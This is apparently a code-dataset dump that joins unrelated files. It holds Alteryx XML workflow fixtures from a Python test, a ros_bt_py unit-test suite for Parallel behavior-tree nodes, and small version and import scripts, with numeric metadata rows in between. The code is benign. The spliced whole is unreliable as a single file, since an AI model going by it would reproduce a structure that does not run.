<Position x="198" y="78" />
</GuiSettings>
<Properties>
<Configuration />
<Annotation DisplayMode="0">
<Name>Macro (2)</Name>
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
</Properties>
<EngineSettings Macro="{0}\Macro.yxmc" />
</Node>
</Nodes>
<Connections>
<Connection>
<Origin ToolID="1" Connection="Output" />
<Destination ToolID="4" Connection="Input2" />
</Connection>
<Connection>
<Origin ToolID="4" Connection="Output3" />
<Destination ToolID="3" Connection="Input" />
</Connection>
</Connections>
<Properties>
<Memory default="True" />
<GlobalRecordLimit value="0" />
<TempFiles default="True" />
<Annotation on="True" includeToolName="False" />
<ConvErrorLimit value="10" />
<ConvErrorLimit_Stop value="False" />
<CancelOnError value="False" />
<DisableBrowse value="False" />
<EnablePerformanceProfiling value="False" />
<DisableAllOutput value="False" />
<ShowAllMacroMessages value="False" />
<ShowConnectionStatusIsOn value="True" />
<ShowConnectionStatusOnlyWhenRunning value="True" />
<ZoomLevel value="0" />
<LayoutType>Horizontal</LayoutType>
<MetaInfo>
<NameIsFileName value="True" />
<Name>Test</Name>
<Description />
<RootToolName />
<ToolVersion />
<ToolInDb value="False" />
<CategoryName />
<SearchTags />
<Author />
<Company />
<Copyright />
<DescriptionLink actual="" displayed="" />
<Example>
<Description />
<File />
</Example>
</MetaInfo>
<Events>
<Enabled value="True" />
</Events>
</Properties>
</AlteryxDocument>""".format(absroot)
single_absolute_macro_container = """<?xml version="1.0"?>
<AlteryxDocument yxmdVer="2019.1">
<Nodes>
<Node ToolID="1">
<GuiSettings Plugin="AlteryxBasePluginsGui.TextInput.TextInput">
<Position x="126" y="138" />
</GuiSettings>
<Properties>
<Configuration>
<NumRows value="1" />
<Fields>
<Field name="Field1" />
</Fields>
<Data>
<r>
<c>A</c>
</r>
</Data>
</Configuration>
<Annotation DisplayMode="0">
<Name />
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
</Properties>
<EngineSettings EngineDll="AlteryxBasePluginsEngine.dll" EngineDllEntryPoint="AlteryxTextInput" />
</Node>
<Node ToolID="4">
<GuiSettings Plugin="AlteryxBasePluginsGui.BrowseV2.BrowseV2">
<Position x="390" y="138" />
</GuiSettings>
<Properties>
<Configuration>
<Layout>
<View1>
<Hints>
<Table />
</Hints>
</View1>
</Layout>
</Configuration>
<Annotation DisplayMode="0">
<Name />
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
</Properties>
<EngineSettings EngineDll="AlteryxBasePluginsEngine.dll" EngineDllEntryPoint="AlteryxBrowseV2" />
</Node>
<Node ToolID="2">
<GuiSettings Plugin="AlteryxGuiToolkit.ToolContainer.ToolContainer">
<Position x="210" y="102" width="145.3507" height="133" />
</GuiSettings>
<Properties>
<Configuration>
<Caption>Container 2</Caption>
<Style TextColor="#314c4a" FillColor="#ecf2f2" BorderColor="#314c4a" Transparency="25" Margin="25" />
<Disabled value="False" />
<Folded value="False" />
</Configuration>
<Annotation DisplayMode="0">
<Name />
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
</Properties>
<ChildNodes>
<Node ToolID="3">
<GuiSettings>
<Position x="235" y="151" />
</GuiSettings>
<Properties>
<Configuration />
<Annotation DisplayMode="0">
<Name />
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
<Dependencies>
<Implicit />
</Dependencies>
</Properties>
<EngineSettings Macro="{0}\Macro.yxmc" />
</Node>
</ChildNodes>
</Node>
</Nodes>
<Connections>
<Connection>
<Origin ToolID="1" Connection="Output" />
<Destination ToolID="3" Connection="Input2" />
</Connection>
<Connection>
<Origin ToolID="3" Connection="Output3" />
<Destination ToolID="4" Connection="Input" />
</Connection>
</Connections>
<Properties>
<Memory default="True" />
<GlobalRecordLimit value="0" />
<TempFiles default="True" />
<Annotation on="True" includeToolName="False" />
<ConvErrorLimit value="10" />
<ConvErrorLimit_Stop value="False" />
<CancelOnError value="False" />
<DisableBrowse value="False" />
<EnablePerformanceProfiling value="False" />
<DisableAllOutput value="False" />
<ShowAllMacroMessages value="False" />
<ShowConnectionStatusIsOn value="True" />
<ShowConnectionStatusOnlyWhenRunning value="True" />
<ZoomLevel value="0" />
<LayoutType>Horizontal</LayoutType>
<MetaInfo>
<NameIsFileName value="True" />
<Name>Test2</Name>
<Description />
<RootToolName />
<ToolVersion />
<ToolInDb value="False" />
<CategoryName />
<SearchTags />
<Author />
<Company />
<Copyright />
<DescriptionLink actual="" displayed="" />
<Example>
<Description />
<File />
</Example>
</MetaInfo>
<Events>
<Enabled value="True" />
</Events>
</Properties>
</AlteryxDocument>""".format(absroot)
single_absolute_macro_invalid = """<?xml version="1.0"?>
<AlteryxDocument yxmdVer="2019.1">
<Nodes>
<Node ToolID="1">
<GuiSettings Plugin="AlteryxBasePluginsGui.TextInput.TextInput">
<Position x="102" y="78" />
</GuiSettings>
<Properties>
<Configuration>
<NumRows value="1" />
<Fields>
<Field name="Field1" />
</Fields>
<Data>
<r>
<c>A</c>
</r>
</Data>
</Configuration>
<Annotation DisplayMode="0">
<Name />
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
</Properties>
<EngineSettings EngineDll="AlteryxBasePluginsEngine.dll" EngineDllEntryPoint="AlteryxTextInput" />
</Node>
<Node ToolID="3">
<GuiSettings Plugin="AlteryxBasePluginsGui.BrowseV2.BrowseV2">
<Position x="294" y="78" />
</GuiSettings>
<Properties>
<Configuration />
<Annotation DisplayMode="0">
<Name />
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
</Properties>
<EngineSettings EngineDll="AlteryxBasePluginsEngine.dll" EngineDllEntryPoint="AlteryxBrowseV2" />
</Node>
<Node ToolID="4">
<GuiSettings>
<Position x="198" y="78" />
</GuiSettings>
<Properties>
<Configuration />
<Annotation DisplayMode="0">
<Name>Macro (2)</Name>
<DefaultAnnotationText />
<Left value="False" />
</Annotation>
</Properties>
<EngineSettings Macro="{0}\InvalidMacro.yxmc" />
</Node>
</Nodes>
<Connections>
<Connection>
<Origin ToolID="1" Connection="Output" />
<Destination ToolID="4" Connection="Input2" />
</Connection>
<Connection>
<Origin ToolID="4" Connection="Output3" />
<Destination ToolID="3" Connection="Input" />
</Connection>
</Connections>
<Properties>
<Memory default="True" />
<GlobalRecordLimit value="0" />
<TempFiles default="True" />
<Annotation on="True" includeToolName="False" />
<ConvErrorLimit value="10" />
<ConvErrorLimit_Stop value="False" />
<CancelOnError value="False" />
<DisableBrowse value="False" />
<EnablePerformanceProfiling value="False" />
<DisableAllOutput value="False" />
<ShowAllMacroMessages value="False" />
<ShowConnectionStatusIsOn value="True" />
<ShowConnectionStatusOnlyWhenRunning value="True" />
<ZoomLevel value="0" />
<LayoutType>Horizontal</LayoutType>
<MetaInfo>
<NameIsFileName value="True" />
<Name>Test</Name>
<Description />
<RootToolName />
<ToolVersion />
<ToolInDb value="False" />
<CategoryName />
<SearchTags />
<Author />
<Company />
<Copyright />
<DescriptionLink actual="" displayed="" />
<Example>
<Description />
<File />
</Example>
</MetaInfo>
<Events>
<Enabled value="True" />
</Events>
</Properties>
</AlteryxDocument>""".format(absroot)
| 29.440678 | 111 | 0.56208 | 781 | 10,422 | 7.486556 | 0.183099 | 0.056439 | 0.058149 | 0.05986 | 0.910552 | 0.903198 | 0.894989 | 0.876005 | 0.876005 | 0.876005 | 0 | 0.023218 | 0.28507 | 10,422 | 353 | 112 | 29.524079 | 0.761509 | 0 | 1 | 0.908046 | 0 | 0.005747 | 0.980426 | 0.15688 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.002874 | 0 | 0.002874 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
3a5197b7f38d7e43121f076ad72623e9b1d06821 | 22,595 | py | Python | ros_bt_py/test/unittest/test_parallel.py | fzi-forschungszentrum-informatik/ros_bt_py | ed65e2b2f0a03411101f455c0ab38401ba50bada | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 4 | 2022-03-11T14:30:43.000Z | 2022-03-31T07:21:35.000Z | ros_bt_py/test/unittest/test_parallel.py | fzi-forschungszentrum-informatik/ros_bt_py | ed65e2b2f0a03411101f455c0ab38401ba50bada | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | ros_bt_py/test/unittest/test_parallel.py | fzi-forschungszentrum-informatik/ros_bt_py | ed65e2b2f0a03411101f455c0ab38401ba50bada | [
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | # -------- BEGIN LICENSE BLOCK --------
# Copyright 2022 FZI Forschungszentrum Informatik
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of the {copyright_holder} nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# -------- END LICENSE BLOCK --------
from copy import deepcopy
import unittest
from ros_bt_py_msgs.msg import Node, UtilityBounds
from ros_bt_py.exceptions import BehaviorTreeException
from ros_bt_py.nodes.mock_nodes import MockLeaf, MockUtilityLeaf
from ros_bt_py.nodes.parallel import Parallel, ParallelFailureTolerance
def make_parallel(needed_successes):
    """Build a Parallel node that requires *needed_successes* child successes."""
    opts = {'needed_successes': needed_successes}
    return Parallel(options=opts)
def make_parallel_failure_tolerance(needed_successes, tolerate_failures):
    """Build a ParallelFailureTolerance node with the given thresholds."""
    opts = {
        'needed_successes': needed_successes,
        'tolerate_failures': tolerate_failures,
    }
    return ParallelFailureTolerance(options=opts)
class TestParallel(unittest.TestCase):
    """Behavior tests for the Parallel flow control node."""

    def setUp(self):
        # Mock leaves scripted via 'state_values': each tick returns the
        # next state in the list (see mock_nodes.MockLeaf for details).
        self.succeeder = MockLeaf(name='succeeder',
                                  options={'output_type': int,
                                           'state_values': [Node.SUCCEEDED],
                                           'output_values': [1]})
        self.failer = MockLeaf(name='failer',
                               options={'output_type': int,
                                        'state_values': [Node.FAILED],
                                        'output_values': [1]})
        self.run_then_succeed = MockLeaf(name='run_then_succeed',
                                         options={'output_type': int,
                                                  'state_values': [Node.RUNNING, Node.SUCCEEDED],
                                                  'output_values': [1, 1]})
        self.run_then_fail = MockLeaf(name='run_then_fail',
                                      options={'output_type': int,
                                               'state_values': [Node.RUNNING, Node.FAILED],
                                               'output_values': [1, 1]})
        self.runner = MockLeaf(name='runner',
                               options={'output_type': int,
                                        'state_values': [Node.RUNNING],
                                        'output_values': [1]})
        # Utility mocks: 'cheap_fail' has lower failure bounds than
        # success bounds, 'cheap_success' the other way around.
        self.cheap_fail = MockUtilityLeaf(
            name='cheap_fail',
            options={
                'can_execute': True,
                'utility_lower_bound_success': 5.0,
                'utility_upper_bound_success': 10.0,
                'utility_lower_bound_failure': 1.0,
                'utility_upper_bound_failure': 2.0})
        self.cheap_success = MockUtilityLeaf(
            name='cheap_success',
            options={
                'can_execute': True,
                'utility_lower_bound_success': 1.0,
                'utility_upper_bound_success': 2.0,
                'utility_lower_bound_failure': 5.0,
                'utility_upper_bound_failure': 10.0})
        self.can_not_execute = MockUtilityLeaf(
            name='can_not_execute',
            options={
                'can_execute': False,
                'utility_lower_bound_success': 0.0,
                'utility_upper_bound_success': 0.0,
                'utility_lower_bound_failure': 0.0,
                'utility_upper_bound_failure': 0.0})

    def testSuccessesException(self):
        """setup() and calculate_utility() raise if needed_successes exceeds the child count."""
        par = make_parallel(3)\
            .add_child(self.succeeder)\
            .add_child(self.run_then_succeed)

        self.assertRaises(BehaviorTreeException, par.setup)
        self.assertRaises(BehaviorTreeException, par.calculate_utility)

    def testWithRunningChildren(self):
        """With a failed child, the Parallel fails even while another child is still RUNNING."""
        par = make_parallel(2)\
            .add_child(self.failer)\
            .add_child(self.runner)
        par.setup()
        # failer's immediate failure makes the required 2 successes
        # unreachable, so the result is FAILED despite runner's RUNNING.
        self.assertEqual(par.tick(), Node.FAILED)
        self.assertEqual(par.untick(), Node.IDLE)
        self.assertEqual(par.reset(), Node.IDLE)
        self.assertEqual(par.shutdown(), Node.SHUTDOWN)

    def testBarrierSuccess(self):
        """The "barrier" configuration (all children must succeed) reports SUCCEEDED."""
        par = make_parallel(2)\
            .add_child(self.succeeder)\
            .add_child(self.run_then_succeed)
        par.setup()
        # run_then_succeed returns RUNNING on the first tick, so we
        # need a second tick
        self.assertEqual(par.tick(), Node.RUNNING)
        self.assertEqual(par.tick(), Node.SUCCEEDED)
        # succeeder should not be ticked again as long as
        # run_then_succeed has not produced a result
        self.assertEqual(self.succeeder.tick_count, 1)
        self.assertEqual(self.run_then_succeed.tick_count, 2)

        self.assertEqual(par.tick(), Node.RUNNING)
        # The Parallel should reset its children after producing a
        # result
        self.assertEqual(self.succeeder.reset_count, 1)
        self.assertEqual(self.run_then_succeed.reset_count, 1)
        self.assertEqual(par.tick(), Node.SUCCEEDED)
        self.assertEqual(self.succeeder.tick_count, 2)
        self.assertEqual(self.run_then_succeed.tick_count, 4)
        par.shutdown()

    def testBarrierFailure(self):
        """In the "barrier" configuration, a single failing child fails the Parallel."""
        par = make_parallel(2)\
            .add_child(self.succeeder)\
            .add_child(self.run_then_fail)
        par.setup()
        # run_then_fail returns RUNNING on the first tick, so we
        # need a second tick
        self.assertEqual(par.tick(), Node.RUNNING)
        self.assertEqual(par.tick(), Node.FAILED)
        # succeeder should not be ticked again as long as
        # run_then_fail has not produced a result
        self.assertEqual(self.succeeder.tick_count, 1)
        self.assertEqual(self.run_then_fail.tick_count, 2)

        self.assertEqual(par.tick(), Node.RUNNING)
        # The Parallel should reset its children after producing a
        # result
        self.assertEqual(self.succeeder.reset_count, 1)
        self.assertEqual(self.run_then_fail.reset_count, 1)
        self.assertEqual(par.tick(), Node.FAILED)
        self.assertEqual(self.succeeder.tick_count, 2)
        self.assertEqual(self.run_then_fail.tick_count, 4)
        par.shutdown()

    def testHeurekaSuccess(self):
        """The "Heureka" configuration returns SUCCEEDED with just a single succeeding child"""
        par = make_parallel(1)\
            .add_child(self.succeeder)\
            .add_child(self.run_then_fail)
        par.setup()
        # Because succeeder immediately succeeds, the Parallel
        # succeeds and resets run_then_fail before the second tick
        self.assertEqual(par.tick(), Node.SUCCEEDED)
        self.assertEqual(self.succeeder.tick_count, 1)
        self.assertEqual(self.run_then_fail.tick_count, 1)

        self.assertEqual(par.tick(), Node.SUCCEEDED)
        self.assertEqual(self.succeeder.reset_count, 1)
        self.assertEqual(self.run_then_fail.reset_count, 1)
        self.assertEqual(self.succeeder.tick_count, 2)
        self.assertEqual(self.run_then_fail.tick_count, 2)
        par.shutdown()

    def testHeurekaFailure(self):
        """The "Heureka" configuration returns FAILED only when all children fail"""
        par = make_parallel(1)\
            .add_child(self.failer)\
            .add_child(self.run_then_fail)
        par.setup()
        # failer fails immediately, but run_then_fail is still RUNNING,
        # so one success is still possible and the Parallel keeps running
        self.assertEqual(par.tick(), Node.RUNNING)
        self.assertEqual(self.failer.tick_count, 1)
        self.assertEqual(self.run_then_fail.tick_count, 1)
        self.assertEqual(par.tick(), Node.FAILED)
        # Again, failer should not be ticked again before run_then_fail produces a result
        self.assertEqual(self.failer.tick_count, 1)
        self.assertEqual(self.run_then_fail.tick_count, 2)

        self.assertEqual(par.tick(), Node.RUNNING)
        self.assertEqual(self.failer.reset_count, 1)
        self.assertEqual(self.run_then_fail.reset_count, 1)
        self.assertEqual(par.tick(), Node.FAILED)
        self.assertEqual(self.failer.tick_count, 2)
        self.assertEqual(self.run_then_fail.tick_count, 4)
        par.shutdown()

    def testParallelUtilityCalculation(self):
        """Utility bounds aggregate differently for needed_successes of 1 vs. 2."""
        par = make_parallel(1)\
            .add_child(self.cheap_success)\
            .add_child(self.cheap_fail)

        expected_bounds = UtilityBounds(
            can_execute=True,
            has_lower_bound_success=True,
            has_upper_bound_success=True,
            has_lower_bound_failure=True,
            has_upper_bound_failure=True)
        cheap_success_bounds = self.cheap_success.calculate_utility()
        cheap_fail_bounds = self.cheap_fail.calculate_utility()
        # With one needed success, the success bounds span from the
        # cheapest child's lower bound to the other child's upper bound,
        # while failing requires every child to fail, so those bounds add.
        expected_bounds.lower_bound_success = cheap_success_bounds.lower_bound_success
        expected_bounds.upper_bound_success = cheap_fail_bounds.upper_bound_success
        expected_bounds.lower_bound_failure = (cheap_success_bounds.lower_bound_failure
                                               + cheap_fail_bounds.lower_bound_failure)
        expected_bounds.upper_bound_failure = (cheap_success_bounds.upper_bound_failure
                                               + cheap_fail_bounds.upper_bound_failure)
        self.assertEqual(par.calculate_utility(), expected_bounds)

        par = make_parallel(2)\
            .add_child(self.cheap_success)\
            .add_child(self.cheap_fail)

        # Now that we need two successes, success and failure are
        # basically swapped
        expected_bounds.lower_bound_success = (cheap_success_bounds.lower_bound_success
                                               + cheap_fail_bounds.lower_bound_success)
        expected_bounds.upper_bound_success = (cheap_success_bounds.upper_bound_success
                                               + cheap_fail_bounds.upper_bound_success)
        expected_bounds.lower_bound_failure = cheap_fail_bounds.lower_bound_failure
        expected_bounds.upper_bound_failure = cheap_success_bounds.upper_bound_failure
        self.assertEqual(par.calculate_utility(), expected_bounds)

    def testParallelUtilityCalculationCanNotExecute(self):
        """A child that cannot execute yields all-False utility bounds."""
        par = make_parallel(1)\
            .add_child(self.can_not_execute)

        expected_bounds = UtilityBounds(
            can_execute=False,
            has_lower_bound_success=False,
            has_upper_bound_success=False,
            has_lower_bound_failure=False,
            has_upper_bound_failure=False)
        self.assertEqual(par.calculate_utility(), expected_bounds)
class TestParallelFailureTolerance(unittest.TestCase):
def setUp(self):
self.succeeder = MockLeaf(name='succeeder',
options={'output_type': int,
'state_values': [Node.SUCCEEDED],
'output_values': [1]})
self.failer = MockLeaf(name='failer',
options={'output_type': int,
'state_values': [Node.FAILED],
'output_values': [1]})
self.run_then_succeed = MockLeaf(name='run_then_succeed',
options={'output_type': int,
'state_values': [Node.RUNNING, Node.SUCCEEDED],
'output_values': [1, 1]})
self.run_then_fail = MockLeaf(name='run_then_fail',
options={'output_type': int,
'state_values': [Node.RUNNING, Node.FAILED],
'output_values': [1, 1]})
self.runner = MockLeaf(name='runner',
options={'output_type': int,
'state_values': [Node.RUNNING],
'output_values': [1]})
self.cheap_fail = MockUtilityLeaf(
name='cheap_fail',
options={
'can_execute': True,
'utility_lower_bound_success': 5.0,
'utility_upper_bound_success': 10.0,
'utility_lower_bound_failure': 1.0,
'utility_upper_bound_failure': 2.0})
self.cheap_success = MockUtilityLeaf(
name='cheap_success',
options={
'can_execute': True,
'utility_lower_bound_success': 1.0,
'utility_upper_bound_success': 2.0,
'utility_lower_bound_failure': 5.0,
'utility_upper_bound_failure': 10.0})
self.can_not_execute = MockUtilityLeaf(
name='can_not_execute',
options={
'can_execute': False,
'utility_lower_bound_success': 0.0,
'utility_upper_bound_success': 0.0,
'utility_lower_bound_failure': 0.0,
'utility_upper_bound_failure': 0.0})
def testSuccessesException(self):
par = make_parallel_failure_tolerance(3, 3)\
.add_child(self.succeeder)\
.add_child(self.run_then_succeed)
self.assertRaises(BehaviorTreeException, par.setup)
self.assertRaises(BehaviorTreeException, par.calculate_utility)
def testOverlyOptimistic(self):
"""Fail if two failures are received"""
par = make_parallel_failure_tolerance(2, 2)\
.add_child(self.failer)\
.add_child(self.runner)
par.setup()
# the node tolerates 2 failures,
# so it continues ticking the running child
# even if it can get 2 successes anymore
self.assertEqual(par.tick(), Node.RUNNING)
self.assertEqual(par.tick(), Node.RUNNING)
self.assertEqual(self.failer.tick_count, 1)
self.assertEqual(self.runner.tick_count, 2)
self.assertEqual(par.untick(), Node.IDLE)
self.assertEqual(par.reset(), Node.IDLE)
self.assertEqual(par.shutdown(), Node.SHUTDOWN)
def testOverlyPessimistic(self):
"""Fail after first failure is received"""
par = make_parallel_failure_tolerance(1, 0)\
.add_child(self.failer)\
.add_child(self.run_then_fail)
par.setup()
# the node tolerates 1 failure,
# so it fails at the first tick,
# even if it could still get 1 success from the other child
self.assertEqual(par.tick(), Node.FAILED)
self.assertEqual(self.failer.tick_count, 1)
self.assertEqual(self.run_then_fail.tick_count, 1)
par.shutdown()
def testBarrierSuccess(self):
par = make_parallel_failure_tolerance(2, 2)\
.add_child(self.succeeder)\
.add_child(self.run_then_succeed)
par.setup()
# run_then_succeed returns RUNNING on the first tick, so we
# need a second tick
self.assertEqual(par.tick(), Node.RUNNING)
self.assertEqual(par.tick(), Node.SUCCEEDED)
# succeeder should not be ticked again as long as
# run_then_succeed has not produced a result
self.assertEqual(self.succeeder.tick_count, 1)
self.assertEqual(self.run_then_succeed.tick_count, 2)
self.assertEqual(par.tick(), Node.RUNNING)
# The Parallel should reset its children after producing a
# result
self.assertEqual(self.succeeder.reset_count, 1)
self.assertEqual(self.run_then_succeed.reset_count, 1)
self.assertEqual(par.tick(), Node.SUCCEEDED)
self.assertEqual(self.succeeder.tick_count, 2)
self.assertEqual(self.run_then_succeed.tick_count, 4)
par.shutdown()
def testBarrierFailure(self):
par = make_parallel_failure_tolerance(2, 0)\
.add_child(self.succeeder)\
.add_child(self.run_then_fail)
par.setup()
# run_then_fail returns RUNNING on the first tick, so we
# need a second tick
self.assertEqual(par.tick(), Node.RUNNING)
self.assertEqual(par.tick(), Node.FAILED)
# succeeder should not be ticked again as long as
# run_then_fail has not produced a result
self.assertEqual(self.succeeder.tick_count, 1)
self.assertEqual(self.run_then_fail.tick_count, 2)
self.assertEqual(par.tick(), Node.RUNNING)
# The Parallel should reset its children after producing a
# result
self.assertEqual(self.succeeder.reset_count, 1)
self.assertEqual(self.run_then_fail.reset_count, 1)
self.assertEqual(par.tick(), Node.FAILED)
self.assertEqual(self.succeeder.tick_count, 2)
self.assertEqual(self.run_then_fail.tick_count, 4)
par.shutdown()
def testHeurekaSuccess(self):
"""The "Heureka" configuration returns SUCCEEDED with just a single succeeding child"""
par = make_parallel_failure_tolerance(1, 1)\
.add_child(self.succeeder)\
.add_child(self.run_then_fail)
par.setup()
# Because succeeder immediately succeeds, the Parallel
# succeeds and resets run_then_fail before the second tick
self.assertEqual(par.tick(), Node.SUCCEEDED)
self.assertEqual(self.succeeder.tick_count, 1)
self.assertEqual(self.run_then_fail.tick_count, 1)
self.assertEqual(par.tick(), Node.SUCCEEDED)
self.assertEqual(self.succeeder.reset_count, 1)
self.assertEqual(self.run_then_fail.reset_count, 1)
self.assertEqual(self.succeeder.tick_count, 2)
self.assertEqual(self.run_then_fail.tick_count, 2)
par.shutdown()
def testHeurekaFailure(self):
"""The "Heureka" configuration returns FAILED only when all children fail"""
par = make_parallel_failure_tolerance(1, 1)\
.add_child(self.failer)\
.add_child(self.run_then_fail)
par.setup()
# Because succeeder immediately succeeds, the Parallel
# succeeds and resets run_then_fail before the second tick
self.assertEqual(par.tick(), Node.RUNNING)
self.assertEqual(self.failer.tick_count, 1)
self.assertEqual(self.run_then_fail.tick_count, 1)
self.assertEqual(par.tick(), Node.FAILED)
# Again, failer should not be ticked again before run_then_fail produces a result
self.assertEqual(self.failer.tick_count, 1)
self.assertEqual(self.run_then_fail.tick_count, 2)
self.assertEqual(par.tick(), Node.RUNNING)
self.assertEqual(self.failer.reset_count, 1)
self.assertEqual(self.run_then_fail.reset_count, 1)
self.assertEqual(par.tick(), Node.FAILED)
self.assertEqual(self.failer.tick_count, 2)
self.assertEqual(self.run_then_fail.tick_count, 4)
par.shutdown()
def testParallelUtilityCalculation(self):
par = make_parallel_failure_tolerance(1, 1)\
.add_child(self.cheap_success)\
.add_child(self.cheap_fail)
expected_bounds = UtilityBounds(
can_execute=True,
has_lower_bound_success=True,
has_upper_bound_success=True,
has_lower_bound_failure=True,
has_upper_bound_failure=True)
cheap_success_bounds = self.cheap_success.calculate_utility()
cheap_fail_bounds = self.cheap_fail.calculate_utility()
expected_bounds.lower_bound_success = cheap_success_bounds.lower_bound_success
expected_bounds.upper_bound_success = cheap_fail_bounds.upper_bound_success
expected_bounds.lower_bound_failure = (cheap_success_bounds.lower_bound_failure
+ cheap_fail_bounds.lower_bound_failure)
expected_bounds.upper_bound_failure = (cheap_success_bounds.upper_bound_failure
+ cheap_fail_bounds.upper_bound_failure)
self.assertEqual(par.calculate_utility(), expected_bounds)
par = make_parallel_failure_tolerance(2, 0)\
.add_child(self.cheap_success)\
.add_child(self.cheap_fail)
# Now that we need two successes, success and failure are
# basically swapped
expected_bounds.lower_bound_success = (cheap_success_bounds.lower_bound_success
+ cheap_fail_bounds.lower_bound_success)
expected_bounds.upper_bound_success = (cheap_success_bounds.upper_bound_success
+ cheap_fail_bounds.upper_bound_success)
expected_bounds.lower_bound_failure = cheap_fail_bounds.lower_bound_failure
expected_bounds.upper_bound_failure = cheap_success_bounds.upper_bound_failure
self.assertEqual(par.calculate_utility(), expected_bounds)
def testParallelUtilityCalculationCanNotExecute(self):
par = make_parallel_failure_tolerance(1, 0)\
.add_child(self.can_not_execute)
expected_bounds = UtilityBounds(
can_execute=False,
has_lower_bound_success=False,
has_upper_bound_success=False,
has_lower_bound_failure=False,
has_upper_bound_failure=False)
self.assertEqual(par.calculate_utility(), expected_bounds)
| 41.611418 | 97 | 0.631334 | 2,569 | 22,595 | 5.303231 | 0.101207 | 0.1101 | 0.078097 | 0.051674 | 0.870669 | 0.857017 | 0.853934 | 0.850117 | 0.846301 | 0.846301 | 0 | 0.009807 | 0.282452 | 22,595 | 542 | 98 | 41.688192 | 0.830506 | 0.170524 | 0 | 0.94051 | 0 | 0 | 0.069693 | 0.034766 | 0 | 0 | 0 | 0 | 0.294618 | 1 | 0.05949 | false | 0 | 0.016997 | 0.005666 | 0.087819 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
28c4014882aeb75f0fd935a12fd3111ffbd078fa | 74 | py | Python | tools/print_version_number.py | sizmailov/pyxmolpp2 | 9395ba1b1ddc957e0b33dc6decccdb711e720764 | [
"MIT"
] | 4 | 2020-06-24T11:07:57.000Z | 2022-01-15T23:00:30.000Z | tools/print_version_number.py | sizmailov/pyxmolpp2 | 9395ba1b1ddc957e0b33dc6decccdb711e720764 | [
"MIT"
] | 84 | 2018-04-22T12:29:31.000Z | 2020-06-17T15:03:37.000Z | tools/print_version_number.py | sizmailov/pyxmolpp2 | 9395ba1b1ddc957e0b33dc6decccdb711e720764 | [
"MIT"
] | 6 | 2018-06-04T09:16:26.000Z | 2022-03-12T11:05:54.000Z | from write_version_info import print_version_number
print_version_number() | 37 | 51 | 0.918919 | 11 | 74 | 5.636364 | 0.636364 | 0.387097 | 0.580645 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054054 | 74 | 2 | 52 | 37 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 1 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 7 |
28d86a4c12410dd09779eb8b6dfe4ae3276681ac | 238 | py | Python | target_extraction/allen/modules/target_position_weight/__init__.py | apmoore1/target-extraction | 4139ecdc432411fcc4ed2723f4165e7dae93544d | [
"Apache-2.0"
] | 5 | 2019-07-27T13:57:47.000Z | 2021-06-16T13:17:44.000Z | target_extraction/allen/modules/target_position_weight/__init__.py | apmoore1/target-extraction | 4139ecdc432411fcc4ed2723f4165e7dae93544d | [
"Apache-2.0"
] | 26 | 2019-05-01T11:56:35.000Z | 2020-06-18T16:06:40.000Z | target_extraction/allen/modules/target_position_weight/__init__.py | apmoore1/target-extraction | 4139ecdc432411fcc4ed2723f4165e7dae93544d | [
"Apache-2.0"
] | 1 | 2019-07-11T07:16:09.000Z | 2019-07-11T07:16:09.000Z | from target_extraction.allen.modules.target_position_weight.target_position_weight import TargetPositionWeight
